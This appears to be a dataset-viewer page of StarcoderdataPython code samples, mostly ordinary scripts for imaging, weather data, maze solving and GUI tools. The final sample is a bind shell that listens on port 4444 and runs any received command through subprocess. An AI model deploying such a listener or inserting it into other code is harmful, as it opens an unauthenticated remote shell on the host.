# # AssertionError: Expected 'get' to have been called once. Called 2 times
# requests.get.assert_called_once() | StarcoderdataPython |
3447477 | import os
import shutil
import sys
import pytest
import torch
from torch.utils.data.dataloader import DataLoader
from torchvision import models, transforms
torchfuel_path = os.path.dirname(
os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))
)
sys.path.append(torchfuel_path)
from torchfuel.data_loaders.image import ImageDataLoader, ImageToImageDataLoader
from torchfuel.models.visible_resnet import VisibleResnet
from torchfuel.visualisation.grad_cam import GradCAM
torch.manual_seed(1)
def test():
dl = ImageDataLoader(
train_data_folder="test/imgs/train",
eval_data_folder="test/imgs/eval",
pil_transformations=[
transforms.RandomHorizontalFlip(),
transforms.RandomVerticalFlip(),
],
batch_size=16,
imagenet_format=True,
)
train_dataloader = dl.train_dl
n_classes = dl.n_classes
device = torch.device("cpu")
it = iter(train_dataloader)
X, y = next(it)
resnet = models.resnet50(pretrained=True)
model = VisibleResnet(resnet, n_classes).to(device)
assert isinstance(model(X), torch.Tensor)
img_folder = "test/imgs/train"
cam_folder = "test/cams"
shutil.rmtree(cam_folder, ignore_errors=True)
visualiser = GradCAM(model, resolution=14)
visualiser.gen_visualisation_for_multiple_images(
device, img_folder, cam_folder, imagenet=True
)
cams = os.listdir(cam_folder)
imgs = []
for subfolder in os.listdir(img_folder):
imgs.extend(os.listdir(os.path.join(img_folder, subfolder)))
assert cams
assert len(cams) == len(imgs)
shutil.rmtree(cam_folder, ignore_errors=True)
if __name__ == "__main__":
test()
| StarcoderdataPython |
365483 | """
This script is part of a Windows Shell Extension that allows you to run executable files
in a sandboxed environment using the right click menu.
Note that the script maps the entire parent directory of the executable,
this is done in order to preserve potential local dependencies.
"""
import sys
import argparse
import pathlib
import winsandbox
def read_args():
parser = argparse.ArgumentParser()
parser.add_argument("executable", help="The executable path to run sandboxed")
parser.add_argument("--network", default=False, action="store_true", help="Enable networking in the sandbox")
parser.add_argument("--run", default=False, action="store_true", help="Run the executable inside the sandbox")
return parser.parse_args()
def main():
args = read_args()
executable = pathlib.PurePath(args.executable)
# Map executable folder to sandbox
mapper = winsandbox.FolderMapper(folder_path=executable.parent, read_only=True)
sandbox_mapped_dir = pathlib.PurePath(r'C:\Users\WDAGUtilityAccount\Desktop') / executable.parent.name
if args.run:
# Run the executable
command = 'cmd /c "{}"'.format(sandbox_mapped_dir / executable.name)
else:
# Only open mapped folder
command = 'explorer "{}"'.format(sandbox_mapped_dir)
# Launch the sandbox
winsandbox.new_sandbox(networking=args.network, logon_script=command, folder_mappers=[mapper])
if __name__ == '__main__':
main()
| StarcoderdataPython |
229718 | <filename>maze-solver/decoder.py
#! /usr/bin/python
import argparse
import numpy as np
parser = argparse.ArgumentParser()
class MazeMDPSolver:
def __init__(self, grid, value_policy):
self.numStates = 0
self.numActions = 4
self.start = 0
self.end = 0
maze, coordinate_to_state_mapping = self.process_grid(grid)
optimal_action = self.process_value_policy(value_policy)
self.simulate_optimal_policy(maze, coordinate_to_state_mapping,
optimal_action)
def process_grid(self, grid):
data = open(grid, 'r').read()
rows = len(data.split('\n')) - 1
cols = len(data.split()) // rows
maze = np.zeros((rows, cols))
for i in range(len(data.split())):
maze[i // cols][i % cols] = data.split()[i]
self.numStates = data.count('0') + 2
coordinate_to_state_mapping = np.zeros((self.numStates, 2))
currentState = 0
for x in range(1, rows - 1):
for y in range(1, cols - 1):
value = maze[x][y]
if value == 0:
coordinate_to_state_mapping[currentState][0] = x
coordinate_to_state_mapping[currentState][1] = y
currentState += 1
elif value == 2:
coordinate_to_state_mapping[currentState][0] = x
coordinate_to_state_mapping[currentState][1] = y
self.start = currentState
currentState += 1
elif value == 3:
coordinate_to_state_mapping[currentState][0] = x
coordinate_to_state_mapping[currentState][1] = y
self.end = currentState
currentState += 1
return maze, coordinate_to_state_mapping
def process_value_policy(self, value_policy):
data = open(value_policy, 'r')
optimal_action = np.zeros((self.numStates, 1))
currentState = 0
for line in data:
elements = line.split(' ')
optimal_action[currentState, 0] = int(elements[1])
currentState += 1
return optimal_action
def simulate_optimal_policy(self, maze, coordinate_to_state_mapping,
optimal_action):
currentState = self.start
while currentState != self.end:
x = coordinate_to_state_mapping[currentState][0]
y = coordinate_to_state_mapping[currentState][1]
if optimal_action[currentState][0] == 0:
print('N', end=" ")
for i in range(self.numStates):
if coordinate_to_state_mapping[i][
0] == x - 1 and coordinate_to_state_mapping[i][
1] == y:
currentState = i
elif optimal_action[currentState][0] == 1:
print('S', end=" ")
for i in range(self.numStates):
if coordinate_to_state_mapping[i][
0] == x + 1 and coordinate_to_state_mapping[i][
1] == y:
currentState = i
elif optimal_action[currentState][0] == 2:
print('E', end=" ")
for i in range(self.numStates):
if coordinate_to_state_mapping[i][
0] == x and coordinate_to_state_mapping[i][
1] == y + 1:
currentState = i
else:
print('W', end=" ")
for i in range(self.numStates):
if coordinate_to_state_mapping[i][
0] == x and coordinate_to_state_mapping[i][
1] == y - 1:
currentState = i
print("")
if __name__ == "__main__":
parser.add_argument("--grid", type=str)
parser.add_argument("--value_policy", type=str)
args = parser.parse_args()
solver = MazeMDPSolver(args.grid, args.value_policy)
| StarcoderdataPython |
6421840 | import tkinter as tk
import tkinter.ttk as ttk
from tkinter.messagebox import showerror
import subprocess
from src.ui.text_area_modal import TextAreaModal
class DiffViewDialog(TextAreaModal):
def __init__(self, diff_left_path, diff_right_path, *args, **kwargs):
super().__init__(*args, **kwargs)
self.diff_left_path = diff_left_path.replace("\\", "/")
self.diff_right_path = diff_right_path.replace("\\", "/")
ttk.Button(self.buttons_frame, text="View with WinMerge", command=self.open_with_winmerge).grid(row=0, column=0, sticky=tk.SE, pady=10, padx=110)
self.raise_to_top()
def open_with_winmerge(self):
try:
subprocess.Popen(["winmergeu", self.diff_left_path, self.diff_right_path])
except Exception as e:
msg = f"Please make sure WinMerge is in your PATH, and that the backup XML and updated XML are still available.\n\n" + str(e)
showerror("Unable to open WinMerge", msg)
| StarcoderdataPython |
3249382 | from numlab.lang.type import Instance, Type
nl_function = Type.get("function")
@nl_function.method('__new__')
def nl__new__(func):
_inst = Instance(nl_function)
_inst.set('func', func)
return _inst
@nl_function.method('__call__')
def nl__call__(self, *args, **kwargs):
return self.get("func")(*args, **kwargs)
| StarcoderdataPython |
3569170 | #!/usr/bin/env python3
import ipdb
#ipdb.set_trace()
import configparser
import os, sys
from matplotlib import pyplot as plt
import xarray as xr
thisDir = os.path.dirname(os.path.abspath(__file__))
parentDir = os.path.dirname(thisDir)
sys.path.insert(0,parentDir)
from metpy.calc import *
from metpy.units import units
import metpy
from skyfield import api
from skyfield.api import EarthSatellite, Topos, load
import numpy as np
from datetime import datetime, timedelta
fobs="obs_grid.nc"
f1="tar/gfs.t18z.pgrb2.0p25.f003"
f1="tar/gfs.t12z.pgrb2.0p25.f006"
f1="/work/noaa/dtc-hwrf/sbao/EMC_post/DOMAINPATH/postprd/GFSPRS.006.iveg2.grb2"
n_clouds=5
n_aerosol=1
def find_var(f,string):
for i in f:
if (string in i and i.startswith(string[0:3])):
found=i
return found
def effr_cld(cld):
min_qc=1.e-7
gfdl_rhor=1000.
gfdl_ccn=1.0e8
gfdl_rewmin=5.0
gfdl_rewmax=10.0
cld_positive=xr.where(cld>min_qc, cld, min_qc)
result=np.exp(1.0/3.0*np.log((3.*cld_positive)/(4.*np.pi*gfdl_rhor*gfdl_ccn)))*1.0e6
result=xr.where(result<gfdl_rewmin, gfdl_rewmin, result)
result=xr.where(result>gfdl_rewmax, gfdl_rewmax, result)
result=xr.where(cld>min_qc, result, 0)
return result*2
def effr_ice(ice,temp):
min_qi=1.e-8
gfdl_tice = 273.16
gfdl_beta = 1.22
gfdl_reimin = 10.0
gfdl_reimax = 150.0
result=xr.full_like(ice,0.0)
ice_positive=xr.where(ice>min_qi, ice, min_qi)
result=xr.where(temp[1:]-gfdl_tice>=-30.0, gfdl_beta / 9.387 * np.exp ((1 - 0.969) * np.log (1.0e3 * ice_positive)) * 1.0e3, result)
result=xr.where(temp[1:]-gfdl_tice<-30.0, gfdl_beta / 9.208 * np.exp ((1 - 0.945) * np.log (1.0e3 * ice_positive)) * 1.0e3, result)
result=xr.where(temp[1:]-gfdl_tice<-40.0, gfdl_beta / 9.337 * np.exp ((1 - 0.920) * np.log (1.0e3 * ice_positive)) * 1.0e3, result)
result=xr.where(temp[1:]-gfdl_tice<-50.0, gfdl_beta / 9.917 * np.exp ((1 - 0.891) * np.log (1.0e3 * ice_positive)) * 1.0e3, result)
result=xr.where(result<gfdl_reimin, gfdl_reimin, result)
result=xr.where(result>gfdl_reimax, gfdl_reimax, result)
result=xr.where(ice>min_qi, result, 0)
return result*2
def effr_rain(rain):
gfdl_rhor=1000.
gfdl_n0r=8.e6
min_qr=1.e-7
gfdl_gammar=17.837789
gfdl_alphar=0.8
gfdl_rermin=0.0
gfdl_rermax=10000.0
rain_positive=xr.where(rain>min_qr, rain, min_qr)
lamdbar=np.exp(0.25*np.log(np.pi*gfdl_rhor*gfdl_n0r/rain_positive))
result=0.5*np.exp(np.log(gfdl_gammar /6.0)/gfdl_alphar)/lamdbar*1.0e6
result=xr.where(result<gfdl_rermin, gfdl_rermin, result)
result=xr.where(result>gfdl_rermax, gfdl_rermax, result)
result=xr.where(rain>min_qr, result, 0)
return result
def effr_snow(snow):
gfdl_rhos=100.
gfdl_n0s=3.e6
min_qs=1.e-8
gfdl_gammas=8.2850630
gfdl_alphas=0.25
gfdl_resmin=0.0
gfdl_resmax=10000.0
snow_positive=xr.where(snow>min_qs, snow, min_qs)
lambdas=np.exp(0.25*np.log(np.pi*gfdl_rhos*gfdl_n0s/snow_positive))
result=0.5*np.exp(np.log(gfdl_gammas /6.0)/gfdl_alphas)/lambdas*1.0e6
result=xr.where(result<gfdl_resmin, gfdl_resmin, result)
result=xr.where(result>gfdl_resmax, gfdl_resmax, result)
result=xr.where(snow>min_qs, result, 0)
return result
def effr_grp(grp):
gfdl_rhog=400.
gfdl_n0g=4.e6
min_qg=1.e-7
gfdl_gammag=11.631769
gfdl_alphag=0.5
gfdl_regmin=0.0
gfdl_regmax=10000.0
grp_positive=xr.where(grp>min_qg, grp, min_qg)
lambdag=np.exp(0.25*np.log(np.pi*gfdl_rhog*gfdl_n0g/grp_positive))
result=0.5*np.exp(np.log(gfdl_gammag /6.0)/gfdl_alphag)/lambdag*1.0e6
result=xr.where(result<gfdl_regmin, gfdl_regmin, result)
result=xr.where(result>gfdl_regmax, gfdl_regmax, result)
result=xr.where(snow>min_qg, result, 0)
return result
def angle_2d(lat,lon,y,m,d,h):
# given surface lat lon and time, calculate the its angles involving satellite and Sun
# information about satellites (chose GOES 16)
sats = api.load.tle('https://celestrak.com/NORAD/elements/goes.txt')
satellite = sats['GOES 16 [+]']
# planets
planets = load('de421.bsp')
sun = planets['sun']
earth= planets['earth']
# create array to hold angles
angles=np.zeros((len(lat),len(lon),5))
for i in range(len(lat)):
for j in range(len(lon)):
#time
ts = api.load.timescale()
tm = ts.tt(y,m,d,h,0,0)
# call the surface station "boston"
boston=Topos(str(lat[i])+' N', str(lon[j])+' E',elevation_m=0.0)
# the angle between the two vectors: earth center to satellite and earth center to observer
theta = satellite.at(tm).separation_from(boston.at(tm))
# geometry
difference = satellite - boston
geometry = difference.at(tm).altaz()
# angles involving satellite
scan = np.round(180 - (90 + geometry[0].degrees + theta.degrees), 2)
zenith = 90-np.round(geometry[0].degrees, 2)
azimuth = np.round(geometry[1].degrees, 2)
angles[i,j,0]=zenith
angles[i,j,1]=azimuth
angles[i,j,2]=scan
# angles involving the Sun
observer = earth + boston
geo2 = observer.at(tm).observe(sun).apparent().altaz()
zenithsun = np.round(geo2[0].degrees, 2)
azimuthsun = np.round(geo2[1].degrees, 2)
angles[i,j,3]=zenithsun
angles[i,j,4]=azimuthsun
return angles
def create_profile2d(f,fobs):
# f is the GRiB2 file
# fo is the file with the target grid
# constants
Rd = 287.0
Rv = 461.0
fv = Rv / Rd - 1
# open GRiB2 file
gfs = xr.open_dataset(f1, engine='pynio')
y0=np.arange(20.0,45.0,0.25)
x0=np.arange(255,290,0.25)
n=len(y0)*len(x0)
# p levels
pint=gfs.lv_ISBL0
# heights
hgt=gfs[find_var(gfs,"HGT_P0_L100_")].sel(lat_0=y0, lon_0=x0,method='nearest')
# y m d h
init_time = hgt.initial_time
month=int(init_time.split('/')[0])
day = int(init_time.split('/')[1])
year =int(init_time.split('/')[2].split(" ")[0])
hour =int(init_time.split('/')[2].split(" ")[1][1:3])
fcst_time = hgt.forecast_time[0]
valid_time = datetime(year,month,day,hour)+timedelta(hours=int(fcst_time))
# water vapor levels
# qp=gfs.lv_ISBL5
# relative humidity
qq=gfs[find_var(gfs,"RH_P0_L100_")].sel(lat_0=y0, lon_0=x0,method='nearest')
# interploate q to all levels (upper levels has no moisture)
# qpint=qq.interp(lv_ISBL5=pint,kwargs={"fill_value": 0.0})
qpint=qq # in new input file qq are on all p levels
# temp
t = gfs[find_var(gfs,"TMP_P0_L100_")].sel(lat_0=y0, lon_0=x0,method='nearest')
# mixing ratio from specific humidity
sphd=gfs[find_var(gfs,"SPFH_P0_L100_")].sel(lat_0=y0,lon_0=x0,method='nearest')
mix=sphd/(1-sphd)*1000
# the mixing ration from RH is saved here but not used.
mix_metpy = mixing_ratio_from_relative_humidity(pint.broadcast_like(t),t,qpint)
mix=xr.DataArray(mix,coords=t.coords,dims=t.dims)
mix.attrs['units']='kg/kg'
# test another way to average mix
mixavg=mix.rolling(lv_ISBL0=2,center=True).mean()[1:]
# get the t and p for the layers (instead of levels)
tavg=t.rolling(lv_ISBL0=2,center=True).mean()[1:]
dp=xr.DataArray(np.diff(pint),dims=pint.dims).broadcast_like(tavg)
dz=xr.DataArray(np.diff(hgt,axis=0),dims=hgt.dims).broadcast_like(tavg)
R=287.05
g=9.8
pavg=-R*tavg*(1+mixavg*fv)*dp/dz/g
rho=-(1+mixavg*fv)*dp/dz/g
mixavg=mixavg #2000.0 #rho*-dz
print(mixavg.max())
# ozone and the five types of "clouds"
o3=gfs[find_var(gfs,"O3MR_P0_L100_")].sel(lat_0=y0, lon_0=x0,method='nearest')
#o3_pavg=o3.interp(lv_ISBL12=pavg.coords['lv_ISBL0'],kwargs={"fill_value": 0.0})
o3_pavg=o3*rho*-dz
# cld=gfs.CLWMR_P0_L100_GLL0.sel(lat_0=y0, lon_0=x0,method='nearest')
cld=gfs[find_var(gfs,"CLWMR_P0_L100_")].sel(lat_0=y0, lon_0=x0,method='nearest')
cld=cld.rename({cld.dims[0]: 'lv_ISBL_HYD'})
cld_pavg=cld.interp(lv_ISBL_HYD=pavg.coords['lv_ISBL0'],kwargs={"fill_value": 0.0})
cld_effr=effr_cld(cld_pavg)
cld_wc=cld_pavg*rho*-dz
ice_cld=gfs[find_var(gfs,"ICMR_P0_L100_")].sel(lat_0=y0, lon_0=x0,method='nearest')
ice_cld=ice_cld.rename({ice_cld.dims[0]: 'lv_ISBL_HYD'})
ice_cld_pavg = ice_cld.interp(lv_ISBL_HYD=pavg.coords['lv_ISBL0'], kwargs={"fill_value": 0.0})
ice_effr=effr_ice(ice_cld_pavg,t)
ice_wc=ice_cld_pavg*rho*-dz
rain_cld=gfs[find_var(gfs,"RWMR_P0_L100_")].sel(lat_0=y0, lon_0=x0,method='nearest')
rain_cld=rain_cld.rename({rain_cld.dims[0]: 'lv_ISBL_HYD'})
rain_cld_pavg = rain_cld.interp(lv_ISBL_HYD=pavg.coords['lv_ISBL0'], kwargs={"fill_value": 0.0})
rain_effr=effr_rain(rain_cld_pavg)
rain_wc=rain_cld_pavg*rho*-dz
snow_cld=gfs[find_var(gfs,"SNMR_P0_L100_")].sel(lat_0=y0, lon_0=x0,method='nearest')
snow_cld=snow_cld.rename({snow_cld.dims[0]: 'lv_ISBL_HYD'})
snow_cld_pavg = snow_cld.interp(lv_ISBL_HYD=pavg.coords['lv_ISBL0'], kwargs={"fill_value": 0.0})
snow_effr=effr_snow(snow_cld_pavg)
snow_wc=snow_cld_pavg*rho*-dz
grp_cld=gfs[find_var(gfs,"GRLE_P0_L100_")].sel(lat_0=y0, lon_0=x0,method='nearest')
grp_cld=grp_cld.rename({grp_cld.dims[0]: 'lv_ISBL_HYD'})
grp_cld_pavg=grp_cld.interp(lv_ISBL_HYD=pavg.coords['lv_ISBL0'], kwargs={"fill_value": 0.0})
grp_effr=effr_snow(grp_cld_pavg)
grp_wc=grp_cld_pavg*rho*-dz
year=valid_time.year
month=valid_time.month
day=valid_time.day
hour=valid_time.hour
angles = angle_2d(t.coords['lat_0'].values, t.coords['lon_0'].values, year,month,day,hour)
xangles = xr.DataArray(angles, name="xangles", dims=[t.dims[1], t.dims[2], 'angles'],
coords=[t.coords['lat_0'], t.coords['lon_0'], np.arange(0, 5)])
datetimes=xr.DataArray(np.zeros((len(y0),len(x0),6)),dims=[t.dims[1],t.dims[2],'ymd'],coords=[t.coords['lat_0'],t.coords['lon_0'],np.arange(0,6)])
datetimes[:, :, 0] = year
datetimes[:, :, 1] = month
datetimes[:, :, 2] = day
datetimes[:, :, 3] = hour
datetimes[:, :, 4] = 0
datetimes[:, :, 5] = 0
# u and v 10m
u10=gfs[find_var(gfs,"UGRD_P0_L103_")]
u10=u10.rename({u10.dims[0]:'lv_HTGL_wind'})
u10=u10.sel(lv_HTGL_wind=10.0, lat_0=y0, lon_0=x0,method='nearest')
v10=gfs[find_var(gfs,"VGRD_P0_L103_")]
v10=v10.rename({v10.dims[0]:'lv_HTGL_wind'})
v10=v10.sel(lv_HTGL_wind=10.0, lat_0=y0, lon_0=x0,method='nearest')
print(u10.max(),u10.min())
speed10m = np.sqrt(u10 * u10 + v10 * v10)
dir10m=np.arctan2(v10, u10)/np.pi*180
# land mask
lm=gfs[find_var(gfs,"LAND_P0_L1_")].sel(lat_0=y0, lon_0=x0,method='nearest')
sm=1-lm
snow=gfs[find_var(gfs,"CSNOW_P0_L1_")].sel(lat_0=y0, lon_0=x0,method='nearest')
ice=gfs[find_var(gfs,"ICEC_P0_L1_")].sel(lat_0=y0, lon_0=x0,method='nearest')
print(lm.max(),lm.min())
print(sm.max(),sm.min())
print(snow.max(),snow.min())
print(ice.max(),ice.min())
# surface temp
sfctemp=gfs[find_var(gfs,"TMP_P0_L1_")].sel(lat_0=y0, lon_0=x0,method='nearest')
print(sfctemp)
# surface type
sfctype=xr.DataArray(np.zeros((len(y0),len(x0),6)),dims=[t.dims[1],t.dims[2],'type'],coords=[t.coords['lat_0'],t.coords['lon_0'],np.arange(0,6)])
# land type
landtype=xr.DataArray(np.zeros((len(y0),len(x0))),dims=[t.dims[1],t.dims[2]],coords=[t.coords['lat_0'],t.coords['lon_0']])
# read surface type database
f = xr.open_dataset("MCD12C1.006.ncml.nc")
modis_data = f.Majority_Land_Cover_Type_1[18][::-1, ::1]
lat = np.arange(-90, 90, 0.05)
lon = np.arange(-180, 180, 0.05)
lon = np.where(lon<0,lon+360,lon)
modis_data = modis_data.assign_coords({"Latitude": lat})
modis_data = modis_data.assign_coords({"Longitude": lon})
# interpolate database to model grid
landtype=modis_data.interp(Latitude=t.coords['lat_0'],Longitude=t.coords['lon_0'])
sfctype[:,:,0]=landtype[:,:]
sfctype[:,:,1:5]=0
datetimes.name="valid_time"
pint.name="plevel"
pavg.name="player"
tavg.name="temp"
mixavg.name="moisture"
o3_pavg.name="o3"
cld_wc.name="water_cloud"
cld_effr.name="water_cloud_effr"
ice_wc.name='ice_cloud'
ice_effr.name="ice_cloud_effr"
snow_wc.name = 'snow_cloud'
snow_effr.name='snow_cloud_effr'
rain_wc.name = 'rain_cloud'
rain_effr.name='rain_cloud_effr'
grp_wc.name = 'graupel_cloud'
grp_effr.name='graupel_cloud_effr'
lm.name="landmask"
sm.name="seamask"
sfctemp.name="sfctemp"
snow.name="snow_cover"
ice.name="ice_cover"
sfctype.name="land_type"
speed10m.name='wind_speed'
dir10m.name="wind_dir"
all_data=xr.merge([xangles,datetimes,pint,pavg,tavg,mixavg,o3_pavg,cld_wc,cld_effr,ice_wc,ice_effr,snow_wc,snow_effr,rain_wc,rain_effr,grp_wc,grp_effr,lm,sfctemp,snow,ice,sfctype,speed10m,dir10m])
print("combined")
all_data.to_netcdf("profile2d4_2021_gfs_EMCUPP_qv1000.nc","w")
if __name__ == "__main__":
create_profile2d(f1,fobs)
| StarcoderdataPython |
9619361 | <filename>src/p3d/pandaManager.py
import logging
import os
import weakref
logger = logging.getLogger(__name__)
class PandaManager:
PANDA_BEHAVIOUR_INIT = 'PandaBehaviourInit'
PANDA_BEHAVIOUR_START = 'PandaBehaviourStart'
PANDA_BEHAVIOUR_STOP = 'PandaBehaviourStop'
PANDA_BEHAVIOUR_DEL = 'PandaBehaviourDel'
def __init__(self):
if not hasattr(self, 'initialised'):
self.pObjs = {}
# Set initialise flag
self.initialised = True
def Init(self):
messenger.send(self.PANDA_BEHAVIOUR_INIT)
def Start(self):
messenger.send(self.PANDA_BEHAVIOUR_START)
def Stop(self):
messenger.send(self.PANDA_BEHAVIOUR_STOP)
def Del(self):
messenger.send(self.PANDA_BEHAVIOUR_DEL)
def RegisterScript(self, filePath, pObj):
"""
Register the script and the instance. Make sure to register the .py
file, not a .pyo or .pyc file.
"""
filePath = os.path.splitext(filePath)[0]# + '.py'
self.pObjs.setdefault(filePath, weakref.WeakSet([]))
self.pObjs[filePath].add(pObj)
def DeregisterScript(self, scriptPath):
filePath = os.path.splitext(scriptPath)[0]
if filePath in self.pObjs:
logger.info('degister: ', filePath)
del self.pObjs[filePath]
else:
logger.info('couldnt find: ', filePath)
def ReloadScripts(self, scriptPaths):
"""
Reload the scripts at the indicated file paths. This means reloading
the code and also recreating any objects that were attached to node
paths in the scene.
"""
scriptPaths = set(scriptPaths) & set(self.pObjs.keys())
for scriptPath in scriptPaths:
logger.info('Reloading script: ', scriptPath)
for pObj in self.pObjs[scriptPath]:
pObjWrpr = base.node_manager.wrap(pObj)
pObjWrpr.ReloadScript(scriptPath) | StarcoderdataPython |
5168691 | <reponame>floroe1988/xzceb-flask_eng_fr
from ibm_cloud_sdk_core import ApiException
from translator import englishToFrench, frenchToEnglish
import unittest
class TestFrenchTranslation(unittest.TestCase):
def test_frenchToEnglish_assertNotEqual(self):
self.assertNotEqual(frenchToEnglish("Bonjour"), "")
def test_frenchToEnglish_assertEqual(self):
self.assertEqual(frenchToEnglish("Bonjour"), {'character_count': 7,
'translations': [{'translation': 'Hello'}],
'word_count': 1})
class TestEnglishTranslation(unittest.TestCase):
def test_englishToFrench_assertNotEqual(self):
self.assertNotEqual(frenchToEnglish("Hello"), "")
def test_englishToFrench_assertEqual(self):
self.assertEqual(englishToFrench("Hello"), {'character_count': 5,
'translations': [{'translation': 'Bonjour'}],
'word_count': 1})
if __name__ == "__main__":
unittest.main() | StarcoderdataPython |
11226303 | import socket
def handle_client(client_socket):
import subprocess
while True:
client_socket.send(b'> ')
request = client_socket.recv(1024)[:-1].decode('ascii')
# print( f"[*] Received: {request}")
res = subprocess.run(request.split(' '), capture_output=True)
client_socket.send(res.stdout)
client_socket.close()
bind_ip = "0.0.0.0"
bind_port = 4444
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip, bind_port))
server.listen(5)
client, addr = server.accept()
handle_client(client)
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.